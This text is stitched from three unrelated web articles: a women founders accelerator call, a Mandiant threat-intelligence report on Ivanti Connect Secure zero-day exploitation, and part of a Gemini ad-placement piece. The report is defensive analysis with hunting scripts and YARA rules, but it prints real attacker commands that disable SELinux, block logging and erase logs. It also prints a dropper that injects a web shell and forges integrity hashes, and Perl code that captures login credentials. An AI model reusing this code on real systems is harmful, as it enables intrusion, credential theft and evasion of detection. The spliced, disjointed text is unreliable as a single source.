To help close this gender gap, we are opening up applications for the Google for Startups Accelerator: Women Founders program for Europe & Israel. This ten-week accelerator is designed to support Seed to Series A women-led AI startups with expert mentorship, technical support, and tailored workshops that lay the groundwork for scaling.
Fostering a more inclusive AI ecosystem
As AI continues to revolutionize industries, ensuring that diverse voices lead the way is critical for driving innovation that benefits everyone. The Google for Startups Accelerator: Women Founders program is working to level the playing field, empowering women-led startups to bring fresh, diverse perspectives to the future of AI.
Margaryta Sivakova, the CEO of Legal Nodes, leveraged support from the program to scale her business: “Through Google for Startups Accelerator, we learned to build, improve, and scale AI solutions, focusing on production-grade AI, MLOps, and the right infrastructure for rapid scaling.”
Maria Terzi, the CEO of Malloc Privacy, received one-on-one support to help users protect their data on their phones: “We joined Google for Startups Accelerator to enhance our technology and gained much more—insights on pricing, sales, UI/UX design, people management, and fast-paced operations.”
Watch highlights from the Google for Startups Accelerator Women Founders program.
Apply now
Women-led startups building with AI in Europe and Israel can apply until January 24 for the 2025 cohort of the Google for Startups Accelerator: Women Founders program.
Written by: John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson
Note: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more indicators, detections, and information to this blog post as needed.
On Wednesday, Jan. 8, 2025, Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. CVE-2025-0282 is an unauthenticated stack-based buffer overflow. Successful exploitation could result in unauthenticated remote code execution, leading to potential downstream compromise of a victim network.
Ivanti and its affected customers identified the compromise based on indications from the company-supplied Integrity Checker Tool (“ICT”) along with other commercial security monitoring tools. Ivanti has been working closely with Mandiant, affected customers, government partners, and security vendors to address these issues. As a result of their investigation, Ivanti has released patches for the vulnerabilities exploited in this campaign and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.
Mandiant is currently performing analysis of multiple compromised Ivanti Connect Secure appliances from multiple organizations. The activity described in this blog utilizes insights collectively derived from analysis of these infected devices; Mandiant has not yet conclusively tied all of the activity described below to a single actor. In at least one of the appliances undergoing analysis, Mandiant observed the deployment of the previously observed SPAWN ecosystem of malware (which includes the SPAWNANT installer, SPAWNMOLE tunneler, and the SPAWNSNAIL SSH backdoor). The deployment of the SPAWN ecosystem of malware following the targeting of Ivanti Connect Secure appliances has been attributed to UNC5337, a cluster of activity assessed with moderate confidence to be part of UNC5221, which is further described in the Attribution section.
Mandiant has also identified previously unobserved malware families from additional compromised appliances, tracked as DRYHOOK and PHASEJAM, which are not currently linked to a known group.
It is possible that multiple actors are responsible for the creation and deployment of these various code families (i.e. SPAWN, DRYHOOK and PHASEJAM), but as of publishing this report, we don’t have enough data to accurately assess the number of threat actors targeting CVE-2025-0282. As additional insights are gathered, Mandiant will continue to update this blog post.
Exploitation
While CVE-2025-0282 affects multiple patch levels of ICS release 22.7R2, successful exploitation is version specific. Prior to exploitation, repeated requests to the appliance have been observed, likely an effort to determine the appliance version before attempting exploitation.
Version detection has been observed using the Host Checker Launcher and the different client installers to determine the version of the appliance. HTTP requests from VPS providers or Tor networks to these URLs, especially in sequential version order, may indicate pre-exploitation reconnaissance.
While there are several variations during the exploitation of CVE-2025-0282, the exploit and script generally perform the following steps:
Disable SELinux
Prevent syslog forwarding
Remount the drive as read-write
Write the script
Execute the script
Deploy one or more web shells
Use sed to remove specific log entries from the debug and application logs
Reenable SELinux
Remount the drive
Immediately after exploitation, the threat actor disables SELinux, uses iptables to block syslog forwarding, and remounts the root partition to enable writing of malware to the appliance.
setenforce 0
iptables -A OUTPUT -p udp --dport 514 -j DROP
iptables -A OUTPUT -p tcp --dport 514 -j DROP
iptables -A OUTPUT -p udp --dport 6514 -j DROP
iptables -A OUTPUT -p tcp --dport 6514 -j DROP
mount -o remount,rw /
Malware Staging
Mandiant observed the threat actor using a shell script to echo a Base64-encoded script into /tmp/.t and then set execution permissions on the file.
Next, the threat actor writes a Base64-encoded ELF binary into /tmp/svb. The ELF binary first uses setuid to set the owner of the process to root. It then executes /tmp/s (PHASEJAM), which inherits the root privileges of the parent process. The threat actor then uses dd to overwrite the svb file with zeros and removes /tmp/.t.
PHASEJAM is a dropper written as a bash shell script that maliciously modifies Ivanti Connect Secure appliance components. The primary functions of PHASEJAM are to insert a web shell into the getComponent.cgi and restAuth.cgi files, block system upgrades by modifying the DSUpgrade.pm file, and overwrite the remotedebug executable so that it can be used to execute arbitrary commands when a specific parameter is passed.
Web Shell
PHASEJAM inserts the web shell into the legitimate files getComponent.cgi and restAuth.cgi as a function named AccessAllow(). The web shell is Perl-based and provides the threat actor with remote access and code execution capabilities on the compromised ICS server. It utilizes the MIME::Base64 module to encode and decode commands and data.
The following summarizes the web shell’s functionality, accessible via specific commands derived from HTTP query parameters (a hunting sketch follows the list):
Command 1: Decodes the code provided in the HTTP_CODE environment variable and writes the result into a file named test.p under the /tmp directory. Executes the file using /bin/bash and returns the output of the command execution to the attacker.
Command 2: Similar to command 1, but executes the provided commands using /home/bin/dsrunpriv and the patched remotedebug file.
Command 3: Writes a file with a name specified in the HTTP_CODE environment variable under the /tmp directory, with content provided in the License parameter. This functionality allows the attacker to upload arbitrary files to the compromised appliance.
Command 4: Reads the content of a file specified in the Base64-decoded HTTP_CODE environment variable and returns the content to the attacker. This enables the attacker to exfiltrate data from the affected appliance.
Command 5: Similar to command 3, but overwrites the target file instead of appending to it, in case it already exists on the appliance.
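Because the web shell is injected as a named Perl function, its presence can be hunted for directly on disk. The following is a minimal, illustrative Python sketch (not an official Ivanti or Mandiant tool); the file paths come from the PHASEJAM sample shown later in this post:
import pathlib

# Files PHASEJAM modifies to host the AccessAllow() web shell,
# per the sample shown later in this post.
TARGETS = [
    "/home/webserver/htdocs/dana-na/jam/getComponent.cgi",
    "/home/webserver/htdocs/dana-na/auth/restAuth.cgi",
]

def scan_for_webshell(paths=TARGETS):
    """Flag CGI files containing the injected AccessAllow() function."""
    hits = []
    for p in paths:
        path = pathlib.Path(p)
        if not path.is_file():
            continue
        text = path.read_text(errors="replace")
        # The dropper injects both the function body and a call to it
        # inside sub main; either string is a strong indicator.
        if "sub AccessAllow()" in text or "AccessAllow();" in text:
            hits.append(p)
    return hits

if __name__ == "__main__":
    for hit in scan_for_webshell():
        print(f"[!] possible PHASEJAM web shell: {hit}")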
Blocked and Simulated Upgrades
To intercept upgrade attempts and simulate an upgrade, PHASEJAM injects a malicious function into the /home/perl/DSUpgrade.pm file named processUpgradeDisplay(). The functionality is intended to simulate an upgrading process that involves thirteen steps, with each of those taking a predefined amount of time. If the ICS administrator attempts an upgrade, the function displays a visually convincing upgrade process that shows each of the steps along with various numbers of dots to mimic a running process. Further details are provided in the System Upgrade Persistence section.
remotedebug Hooking
PHASEJAM renames the file /home/bin/remotedebug to remotedebug.bak. PHASEJAM writes a new /home/bin/remotedebug shell script to hook calls to remotedebug. The brief shell script checks for a new -c parameter that allows remote code execution by the web shell. All other parameters are passed through to remotedebug.bak.
The following provides an abridged PHASEJAM Sample:
# create backdoor 1
cp /home/webserver/htdocs/dana-na/jam/getComponent.cgi /home/webserver/htdocs/dana-na/jam/getComponent.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if $r7;/g' /home/webserver/htdocs/dana-na/jam/getComponent.cgi
sh=$(echo CnN1YiB...QogICAK|base64 -d)
up=$(echo CnN1YiB...xuIjsKCn0K |base64 -d)
grep -q 'sub AccessAllow()' /home/webserver/htdocs/dana-na/jam/getComponent.cgi || echo "$sh" >> /home/webserver/htdocs/dana-na/jam/getComponent.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/jam/getComponent.cgi /home/etc/manifest/manifest -a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256 /home/webserver/htdocs/dana-na/jam/getComponent.cgi |grep -oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# create backdoor 2
cp /home/webserver/htdocs/dana-na/auth/restAuth.cgi /home/webserver/htdocs/dana-na/auth/restAuth.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if $r7;/g' /home/webserver/htdocs/dana-na/auth/restAuth.cgi
grep -q 'sub AccessAllow()' /home/webserver/htdocs/dana-na/auth/restAuth.cgi || echo "$sh" >> /home/webserver/htdocs/dana-na/auth/restAuth.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/auth/restAuth.cgi /home/etc/manifest/manifest -a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256 /home/webserver/htdocs/dana-na/auth/restAuth.cgi |grep -oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# remotedebug
cp -f /home/bin/remotedebug /home/bin/remotedebug.bak
echo IyEvYmluL2Jhc2gKaWYgWyAiJDEiID09ICItYyIgXTsgdGhlbgoJYmFzaCAiJEAiCmVsc2UKCWV4ZWMgL2hvbWUvYmluL3JlbW90ZWRlYnVnLmJhayAiJEAiCmZpICAK|base64 -d >/home/bin/remotedebug
chmod 777 /home/bin/remotedebug.bak
sed -i "s/$(grep /home/bin/remotedebug /home/etc/manifest/manifest -a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256 /home/bin/remotedebug |grep -oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
# upgrade
cp -f /home/perl/DSUpgrade.pm /home/perl/DSUpgrade.pm.bak
sed -i 's/popen(*FH, $prog);/processUpgradeDisplay($prog, $console, $html);return 0;popen(*FH, $prog);/g' /home/perl/DSUpgrade.pm
grep -q 'sub processUpgradeDisplay()' /home/perl/DSUpgrade.pm || echo "$up" >> /home/perl/DSUpgrade.pm
sed -i "s/$(grep /home/perl/DSUpgrade.pm /home/etc/manifest/manifest -a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256 /home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
pkill cgi-server
Anti-Forensics
Following exploitation, the threat actor has been observed removing evidence of exploitation from several key areas of the appliance:
Clearing kernel messages using dmesg and removing entries from the debug logs that are generated during the exploit
Deleting troubleshoot information packages (state dumps) and any core dumps generated from process crashes
Removing application event log entries related to syslog failures, internal ICT failures, crash traces, and certificate handling errors
Removing executed commands from the SELinux audit log
dmesg -C
cd /data/var/dlogs/
sed -i '/segfault/d' debuglog
sed -i '/segfault/d' debuglog.old
sed -i '/SystemError/d' debuglog
sed -i '/SystemError/d' debuglog.old
sed -i '/ifttls/d' debuglog
sed -i '/ifttls/d' debuglog.old
sed -i '/main.cc/d' debuglog
sed -i '/main.cc/d' debuglog.old
sed -i '/SSL_read/d' debuglog
sed -i '/SSL_read/d' debuglog.old
sed -i '/tlsconnectionpoint/d' debuglog
sed -i '/tlsconnectionpoint/d' debuglog.old
rm -rf /data/var/statedumps/*
rm -rf /data/var/cores/*
cd /home/runtime/logs
sed -i 's/[^\x00]{1}\x00[^\x00]*web server[^\x00]*\x00//g' log.events.vc0
sed -i 's/[^\x00]{1}\x00[^\x00]*AUT24604[^\x00]*\x00//g' log.events.vc0
sed -i 's/[^\x00]{1}\x00[^\x00]*SYS31048[^\x00]*\x00//g' log.events.vc0
sed -i 's/[^\x01]{1}\x01[^\x01]*SYS31376[^\x01]*\x01//g' log.events.vc0
sed -i 's/\x01[^\x01]{2,3}6[^\x01]*ERR10073[^\xff]*\x09[^\x01]{1}\x01/\x01/g' log.events.vc0
cd /data/var/log/audit/
sed -i '/bin\/web/d' audit.log
sed -i '/setenforce/d' audit.log
sed -i '/mount/d' audit.log
sed -i '/bin\/rm/d' audit.log
System Upgrade Persistence
Mandiant identified two techniques the threat actor employed to persist across system upgrades on compromised Ivanti Connect Secure appliances.
Fake System Upgrades
The first technique, utilized by PHASEJAM, prevents legitimate ICS system upgrade attempts by administrators by rendering a fake HTML upgrade progress bar while silently blocking the legitimate upgrade process. Because the upgrade is blocked, the technique allows any installed backdoors or tools left by the threat actor to persist on the currently running version of the VPN while giving the appearance of a successful upgrade.
First, the threat actor uses sed to insert malicious Perl code into DSUpgrade.pm to modify the behavior of the system upgrade process. The malicious processUpgradeDisplay() function, which is stored in the shell variable $up, is appended to DSUpgrade.pm.
The modification occurs within a function in DSUpgrade.pm responsible for installing the new upgrade package. The inserted call to processUpgradeDisplay() with the early return makes the legitimate popen() call to execute /pkg/dspkginstall unreachable. The following provides the relevant excerpt from DSUpgrade.pm as a result of the modification.
local *FH;
my $prog = "/pkg/dspkginstall /var/tmp/new-pack.tgz";
if (defined $useUpgradePartition && $useUpgradePartition == 1) {
$prog = "/pkg/dspkginstall /data/upgrade/new-pack.tgz";
}
processUpgradeDisplay($prog, $console, $html);
return 0;
popen(*FH, $prog);
The modification intercepts the standard upgrade flow by calling the maliciously created processUpgradeDisplay() function before the legitimate upgrade command executes. The inserted processUpgradeDisplay() function displays a fake HTML upgrade progress bar, using the sleep command to add dots every second to mimic a running process.
Recent versions of Ivanti Connect Secure have a built-in integrity checker tool (ICT) that periodically scans the file system to detect new or modified system files that may be indicative of system compromise. The ICT uses a manifest during its scanning process, containing a list of the expected file paths on the system along with their expected SHA256 hashes. In an attempt to circumvent the ICT scanner, the threat actor recalculates the SHA256 hash of the modified DSUpgrade.pm and inserts it into the manifest.
sed -i "s/$(grep /home/perl/DSUpgrade.pm
/home/etc/manifest/manifest -a |grep -oE
'[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
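Because the threat actor rewrites the manifest entry itself, comparing on-box hashes against the on-box manifest will not reveal the change; verification is only meaningful against an offline, known-good manifest. The following Python sketch illustrates such a comparison; the one-line manifest format assumed here (SHA256 hash followed by file path) is an assumption for illustration:
import hashlib
import sys

def sha256_of(path):
    """Compute the SHA256 hash of a file in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def load_manifest(path):
    """Parse a manifest of '<sha256> <path>' lines (assumed format)."""
    entries = {}
    with open(path) as f:
        for line in f:
            parts = line.split()
            if len(parts) == 2 and len(parts[0]) == 64:
                entries[parts[1]] = parts[0]
    return entries

def diff_manifests(trusted_path, onbox_path):
    """Report entries where the on-box manifest diverges from a trusted copy."""
    trusted = load_manifest(trusted_path)
    onbox = load_manifest(onbox_path)
    for file_path, good_hash in trusted.items():
        if onbox.get(file_path) != good_hash:
            print(f"[!] manifest entry altered: {file_path}")

if __name__ == "__main__":
    diff_manifests(sys.argv[1], sys.argv[2])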
The threat actor copies the VERSION file from the mounted upgrade partition (/tmp/root/home/VERSION) to the current version partition (/home/VERSION). As a result, the system falsely indicates a successful upgrade while continuing to run on the old appliance version.
SPAWNANT and its supporting components can persist across system upgrades. It hijacks the execution flow of dspkginstall, a binary used during the system upgrade process, by exporting a malicious snprintf function containing the persistence mechanism.
Unlike the first method described in this blog post for system upgrade persistence, SPAWNANT does not block the upgrade process. It survives the upgrade process by ensuring itself and its components are migrated to the new upgrade partition (mounted on /tmp/data/ during a legitimate system upgrade process).
SPAWNANT sets the LD_PRELOAD environment variable to itself (libupgrade.so) within DSUpgrade.pm on the upgrade partition. The modification tells the dynamic linker to load libupgrade.so and use SPAWNANT’s malicious exported snprintf function before other libraries.
ENV{"LD_PRELOAD"} = "libupgrade.so"
Next, SPAWNANT establishes an additional method of backdoor access by writing a web shell into compcheckresult.cgi on the upgrade partition. The web shell uses system() to execute the value passed to a hard-coded query parameter.
Throughout this entire process, SPAWNANT is careful to circumvent the ICT by recalculating the SHA256 hash for any maliciously modified files. Once the appropriate modifications are complete, SPAWNANT generates a new RSA key pair to sign the modified manifest.
After establishing an initial foothold on an appliance, Mandiant observed a number of different tunnelers, including the use of publicly-available and open-source tunnelers, designed to facilitate communication channels between the compromised appliance and the threat actor’s command and control infrastructure. These tunnelers allowed the attacker to bypass network security controls and may enable lateral movement further into a victim environment.
SPAWNMOLE
Originally reported in Cutting Edge, Part 4, SPAWNMOLE is a tunneler injected into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. SPAWNMOLE is activated when it detects a specific series of magic bytes. Otherwise, the remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer.
LDAP Queries
The threat actor used several tools to perform internal network reconnaissance. This includes using built-in tools available on the ICS appliance, such as nmap and dig, to determine what can be accessed from the appliance. The threat actor has also been observed using the LDAP service account, if configured, from the ICS appliance to perform LDAP queries. The LDAP service account was also used to move laterally within the network, including to Active Directory servers, through SMB or RDP.
LDAP queries were executed using /tmp/lmdbcerr, with output directed to randomly named files in the /tmp directory. Password, host, and query were passed as command line arguments.
Mandiant has observed the threat actor archiving the database cache on a compromised appliance and staging the archived data in a directory served by the public-facing web server to enable exfiltration of the database. The database cache may contain information associated with VPN sessions, session cookies, API keys, certificates, and credential material.
The threat actor archives the contents of /runtime/mtmp/lmdb. The resulting tar archive is then renamed to masquerade as a CSS file located within /home/webserver/htdocs/dana-na/css/.
Ivanti has previously published guidance on remediating the risk that may result from the database cache dump. This includes resetting local account credentials, resetting API keys, and revoking certificates.
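Given that the staged archive only masquerades as a stylesheet by its file name, one illustrative way to hunt for this technique is to check the magic bytes of files in the web-served css directory. The following Python sketch is an assumption-laden example, not a vetted detection; the directory path comes from the observed activity:
import pathlib

# Directory where the threat actor staged tar archives as fake CSS files.
CSS_DIR = "/home/webserver/htdocs/dana-na/css/"

def looks_like_archive(path):
    """Return True if a file starts with gzip magic or carries a ustar tar header."""
    data = pathlib.Path(path).read_bytes()
    if data[:2] == b"\x1f\x8b":                        # gzip magic
        return True
    if len(data) > 262 and data[257:262] == b"ustar":  # POSIX tar header
        return True
    return False

def hunt(css_dir=CSS_DIR):
    for p in pathlib.Path(css_dir).glob("*.css"):
        if looks_like_archive(p):
            print(f"[!] archive masquerading as CSS: {p}")

if __name__ == "__main__":
    hunt()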
Credential Harvesting
Mandiant has observed the threat actor deploying a Python script, tracked as DRYHOOK, to steal credentials. The malware is designed to modify a system component named DSAuth.pm that belongs to the Ivanti Connect Secure environment in order to harvest successful authentications.
Upon execution, the malicious Python script opens /home/perl/DSAuth.pm and reads its content into a buffer. Next, the malware uses regular expressions to find and replace several blocks of code.
The *setPrompt handler is replaced with the following Perl code:
# *setPrompt
$ds_g="";
sub setPrompt{
eval{
my $res=@_[1]."=".@_[2]."\n";
$ds_g .= $res;
};
return DSAuthc::RealmSignin_setPrompt(@_);
}
$ds_e="";
The injected setPrompt routine captures the second and the third parameter, combines them into the format <param2>=<param3> and then assigns the produced string to a global variable named $ds_g. The next replacement, shown as follows, reveals that the second parameter is a username, and the third parameter is the password of a user trying to authenticate.
# *runSignin = *DSAuthc::RealmSignin_runSignin;
$ds_g1="";
sub encode_base64 ($;$)
{
my $res = "";
my $eol = $_[1];
$eol = "n" unless defined $eol;
pos($_[0]) = 0; # ensure start at the beginning
$res = join '', map( pack('u',$_)=~ /^.(S*)/, ($_[0]=~/(.{1,45})/gs));
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
return $res;
}
sub runSignin{
my $res=DSAuthc::RealmSignin_runSignin(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."\n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e1="";
The code above contains two subroutines named encode_base64 and runSignin. The former takes a string and Base64 encodes it, while the latter intercepts the sign-in process and, upon a successful attempt, writes the credentials saved in the global variable $ds_g (the username and password) to a file named cmdmmap.kuwMW under the /tmp directory. The <username>=<password> string is first RC4 encrypted with a hard-coded key and then Base64 encoded with the encode_base64 routine before being saved into the cmdmmap.kuwMW file.
The last code replacement is shown as follows; it is the same code as above, but it targets a different sign-in scheme, named EBSL in the code.
# *runSigninEBSL
$ds_g2="";
sub runSigninEBSL{
my $res=DSAuthc::RealmSignin_runSigninEBSL(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
use Crypt::RC4;
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."\n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e2="";
After the changes are made, the malware attempts to write the modified content back to the DSAuth.pm file; if unsuccessful, it remounts the file system as read-write, writes the file, and then remounts the file system as read-only again. Finally, all instances of the cgi-server process are killed so that the modified DSAuth.pm takes effect.
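For analysts who recover the hard-coded RC4 key from a DRYHOOK sample, the captured credentials can be decoded by reversing the two steps described above: Base64-decode each line, then RC4-decrypt it. A minimal Python sketch follows; the key is a placeholder, since the actual key is redacted:
import base64

def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4 keystream cipher (encryption and decryption are identical)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def decode_cmdmmap(path="cmdmmap.kuwMW", key=b"<recovered-key>"):
    """Decode each Base64 line, then RC4-decrypt to 'username=password'."""
    with open(path) as f:
        for line in f:
            line = line.strip()
            if line:
                print(rc4(key, base64.b64decode(line)).decode(errors="replace"))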
Attribution
Mandiant has previously only observed the deployment of the SPAWN ecosystem of malware on Ivanti Connect Secure appliances by UNC5337. UNC5337 is a China-nexus cluster of espionage activity, including operations that compromised Ivanti Connect Secure VPN appliances as early as January 2024 and as recently as December 2024. This included the January 2024 exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) to compromise Ivanti Connect Secure appliances. UNC5337 then leveraged multiple custom malware families, including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is part of UNC5221.
UNC5221 is a suspected China-nexus espionage actor that exploited vulnerabilities CVE-2023-46805 and CVE-2024-21887, which impacted Ivanti Connect Secure VPN and Ivanti Policy Secure appliances, as early as December 2023. Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, including the ZIPLINE passive backdoor, THINSPOOL dropper, LIGHTWIRE web shell, and WARPWIRE credential harvester. UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity. Additionally, Mandiant previously observed UNC5221 leveraging a likely ORB network of compromised Cyberoam appliances to enable intrusion operations.
Conclusion
Following the Jan. 10, 2024, disclosure of CVE-2023-46805 and CVE-2024-21887, Mandiant observed widespread exploitation by UNC5221 targeting Ivanti Connect Secure appliances across a wide range of countries and verticals. Mandiant assesses that defenders should be prepared for widespread, opportunistic exploitation, likely targeting credentials and the deployment of web shells to provide future access. Additionally, if proof-of-concept exploits for CVE-2025-0282 are created and released, Mandiant assesses it is likely additional threat actors may attempt targeting Ivanti Connect Secure appliances.
Recommendations
Ivanti recommends utilizing their external and internal Integrity Checker Tool (“ICT”) and contacting Ivanti Support if suspicious activity is identified. While Mandiant has observed threat actor attempts to evade detection by the ICT, the following screenshots provide examples of how a successful scan should appear versus an unsuccessful scan on a device that has been compromised. Note the number of steps reported by the output.
External ICT Scan – Successful
External ICT Scan – Unsuccessful (limited number of steps performed)
Ivanti also notes that the ICT is a snapshot of the current state of the appliance and cannot necessarily detect threat actor activity if the appliance has been returned to a clean state. The ICT does not scan for malware or other indicators of compromise. Ivanti recommends that customers run the ICT in conjunction with other security monitoring tools which have detected post-exploitation activity.
If the ICT result shows signs of compromise, Ivanti recommends a factory reset on the appliance to ensure any malware is removed and to then place the appliance back into production using version 22.7R2.5.
Acknowledgement
We would like to thank the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a publicly available GTI Collection.
rule M_APT_Installer_SPAWNSNAIL_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH
backdoor targeting Ivanti devices. It has an ability to inject a specified
binary to other process, running local SSH backdoor when injected to
dsmdm process, as well as injecting additional malware to dslogserver"
md5 = "e7d24813535f74187db31d4114f607a1"
strings:
$priv = "PRIVATE KEY-----" ascii fullword
$key1 = "%d/id_ed25519" ascii fullword
$key2 = "%d/id_ecdsa" ascii fullword
$key3 = "%d/id_rsa" ascii fullword
$sl1 = "[selinux] enforce" ascii fullword
$sl2 = "DSVersion::getReleaseStr()" ascii fullword
$ssh1 = "ssh_set_server_callbacks" ascii fullword
$ssh2 = "ssh_handle_key_exchange" ascii fullword
$ssh3 = "ssh_add_set_channel_callbacks" ascii fullword
$ssh4 = "ssh_channel_close" ascii fullword
condition:
uint32(0) == 0x464c457f and $priv and any of ($key*)
and any of ($sl*) and any of ($ssh*)
}
rule M_APT_Installer_SPAWNANT_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNANT. SPAWNANT is an
Installer targeting Ivanti devices. Its purpose is to persistently
install other malware from the SPAWN family (SPAWNSNAIL,
SPAWNMOLE) as well as drop additional webshells on the box."
strings:
$s1 = "dspkginstall" ascii fullword
$s2 = "vsnprintf" ascii fullword
$s3 = "bom_files" ascii fullword
$s4 = "do-install" ascii
$s5 = "ld.so.preload" ascii
$s6 = "LD_PRELOAD" ascii
$s7 = "scanner.py" ascii
condition:
uint32(0) == 0x464c457f and 5 of ($s*)
}
rule M_APT_Tunneler_SPAWNMOLE_1
{
meta:
author = "Mandiant"
description = "Detects a specific comparisons in SPAWNMOLE
tunneler, which allow malware to filter put its own traffic .
SPAWNMOLE is a tunneler written in C and compiled as an ELF32
executable. The sample is capable of hijacking a process on the
compromised system with a specific name and hooking into its
communication capabilities in order to create a proxy server for
tunneling traffic."
md5 = "4f79c70cce4207d0ad57a339a9c7f43c"
strings:
/*
3C 16 cmp al, 16h
74 14 jz short loc_5655C038
0F B6 45 C1 movzx eax, [ebp+var_3F]
3C 03 cmp al, 3
74 0C jz short loc_5655C038
0F B6 45 C5 movzx eax, [ebp+var_3B]
3C 01 cmp al, 1
0F 85 ED 00 00 00 jnz loc_5655C125
*/
$comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2]
3C 01 0F 85 }
/*
81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h
0F 85 CD 00 00 00 jnz loc_5655C128
81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h
0F 85 C0 00 00 00 jnz loc_5655C128
*/
$comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3
1B 0F 85}
condition:
uint32(0) == 0x464c457f and all of them
}
Online video consumption has skyrocketed. A staggering 1.8 billion people globally subscribed to streaming services in 2023, and 92% of internet users worldwide watched online videos every month in 2024. This growth creates a significant opportunity for advertisers who want to reach their customers with great creative, but ineffective ad placement can disrupt their customers’ viewing experiences.
An important way to deliver a better ad experience is seamless ad integration, which means placing ads at natural breaks in video content to avoid interrupting the narrative flow. Scene change detection technology identifies these natural breaks by analyzing a video’s visual, audio, and textual elements. Google’s AI models such as Gemini offer a win-win for viewers and advertisers:
Increased viewer engagement: Seamless ad integration minimizes disruption and enhances the viewing experience.
Higher ad revenue: More relevant ads lead to better click-through rates and increased advertiser ROI.
Simplified workflows: Google Cloud’s Vertex AI platform streamlines the entire video monetization process, from scene detection to ad placement.
To help you maximize the potential of your ad inventory, we’ll share how Google Cloud’s generative AI revolutionizes scene detection, leading to more effective ad placement, improved reach, higher viewer engagement, and ultimately, increased revenue for publishers.
The challenges of traditional ad break detection
Traditional ad break detection methods, designed primarily for structured television content with fade-outs and fixed commercial breaks, often struggle to identify ideal ad placement points in today’s diverse video landscape. These methods—including shot boundary detection, motion analysis, audio analysis, and rule-based systems—can miss subtle transitions, misinterpret rapid movement, operate independently of visual context, lack flexibility, and rely on manual tagging. This is where Google’s Gemini models can help.
Intelligent scene detection with Google’s Gemini models
Gemini’s multimodal capabilities can analyze video, audio, and text simultaneously, enabling a level of nuanced scene understanding that was previously impossible. We can now ask Gemini to interpret the nuances of video content and generate highly granular contextual metadata, unlocking capabilities that were previously impractical to achieve efficiently.
Here are some examples of how Gemini identifies ad breaks and provides detailed contextual metadata:
Ad break example: Daytime to Evening Dinner
Transition feeling: Cheerful, relaxed
Transition type: Outdoor to indoor
Narrative type: Scene transition from plot to end
Prior scene summary: A group of friends enjoying dinner at a restaurant.

Ad break example: End of Tense Dialogue Scene
Transition feeling: Tense, dramatic
Transition type: Fade-out
Narrative type: Scene of rising conflict
Prior scene summary: Two characters arguing over a specific issue.

Ad break example: Busy Street to Quiet Cafe
Transition feeling: Neutral
Transition type: Hard cut, outdoor to indoor
